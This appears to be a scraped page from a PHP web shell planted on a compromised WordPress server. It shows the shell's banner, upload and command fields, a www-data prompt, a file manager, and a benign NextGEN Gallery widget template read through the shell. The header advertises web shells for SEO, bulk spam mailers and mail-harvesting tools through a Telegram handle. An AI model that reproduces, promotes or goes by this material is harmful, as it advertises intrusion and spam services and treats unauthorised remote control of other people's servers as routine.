__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<p>
	<label for='<?php echo $self->get_field_id( 'title' ); ?>'>
		<?php _e( 'Title', 'nggallery' ); ?>:
	</label>

	<input class='widefat'
			id='<?php echo $self->get_field_id( 'title' ); ?>'
			name='<?php echo $self->get_field_name( 'title' ); ?>'
			type='text'
			value='<?php echo $title; ?>'/>
</p>

<p>
	<label for='<?php echo $self->get_field_id( 'galleryid' ); ?>'>
		<?php _e( 'Select Gallery', 'nggallery' ); ?>:
	</label>

	<select size='1'
			name='<?php echo $self->get_field_name( 'galleryid' ); ?>'
			id='<?php echo $self->get_field_id( 'galleryid' ); ?>'
			class='widefat'>
		<option value='0' 
		<?php
		if ( 0 == $instance['galleryid'] ) {
			echo 'selected="selected" ';}
		?>
		>
			<?php _e( 'All images', 'nggallery' ); ?>
		</option>
		<?php
		if ( $tables ) {
			foreach ( $tables as $table ) {
				echo '<option value="' . $table->gid . '" ';
				if ( $table->gid == $instance['galleryid'] ) {
					echo 'selected="selected" ';
				}
				echo '>' . $table->title . '</option>';
			}
		}
		?>
	</select>
</p>

<p id ='<?php echo $self->get_field_id( 'limit' ); ?>_container' 
					<?php
					if ( 0 != $instance['galleryid'] ) {
						?>
	style="display: none;" <?php } ?>>
	<label for='<?php echo $self->get_field_id( 'limit' ); ?>'>
		<?php _e( 'Limit', 'nggallery' ); ?>:
	</label>
	<input id='<?php echo $self->get_field_id( 'limit' ); ?>'
			name='<?php echo $self->get_field_name( 'limit' ); ?>'
			type='number'
			min='0'
			step='1'
			style="padding: 3px; width: 45px;"
			value="<?php echo $limit; ?>"/>
</p>

<p>
	<label for='<?php echo $self->get_field_id( 'height' ); ?>'>
		<?php _e( 'Height', 'nggallery' ); ?>:
	</label>

	<input id='<?php echo $self->get_field_id( 'height' ); ?>'
			name='<?php echo $self->get_field_name( 'height' ); ?>'
			type='text'
			style='padding: 3px; width: 45px;'
			value='<?php echo $height; ?>'/>
</p>

<p>
	<label for='<?php echo $self->get_field_id( 'width' ); ?>'>
		<?php _e( 'Width', 'nggallery' ); ?>:
	</label>

	<input id='<?php echo $self->get_field_id( 'width' ); ?>'
			name='<?php echo $self->get_field_name( 'width' ); ?>'
			type='text'
			style='padding: 3px; width: 45px;'
			value='<?php echo $width; ?>'/>
</p>

<!-- only show the limit field when 'all images' is selected -->
<script type="text/javascript">
	(function($) {
		$('#<?php echo $self->get_field_id( 'galleryid' ); ?>').on('change', function() {
			if ($(this).val() == 0) {
				$('#<?php echo $self->get_field_id( 'limit' ); ?>_container').show();
			} else {
				$('#<?php echo $self->get_field_id( 'limit' ); ?>_container').hide();
			}
		});
	})(jQuery);
</script>

Filemanager

Name Type Size Permission Actions
Gallery.php File 3.86 KB 0644
MediaRSS.php File 1.73 KB 0644
Slideshow.php File 2.57 KB 0644
Filemanager